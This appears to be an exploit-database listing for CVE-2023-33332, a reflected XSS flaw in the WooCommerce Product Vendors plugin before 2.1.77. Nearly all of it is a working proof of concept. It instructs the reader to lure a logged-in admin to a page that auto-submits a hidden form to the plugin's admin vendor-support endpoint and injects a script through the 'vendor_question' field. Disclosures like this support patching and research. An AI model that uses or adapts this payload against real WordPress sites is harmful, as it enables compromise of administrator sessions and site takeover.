Exploit for WooCommerce Product Vendors < 2.1.77 - Reflected XSS CVE-2023-33332

Name: Exploit for WooCommerce Product Vendors < 2.1.77 - Reflected XSS CVE-2023-33332
Rating: 5 (181 reviews)

2023-06-21 | CVSS 5.8

## https://sploitus.com/exploit?id=WPEX-ID:FB6DFD45-B5DD-40BD-BD23-4945FC00E4B9
Make a logged in admin open a page with the code below

html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=wcpv-vendor-support" method="POST">
      <input type="hidden" name="vendor&#95;question" value="<&#47;textarea><script>alert&#40;/XSS/&#41;&#59;<&#47;script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>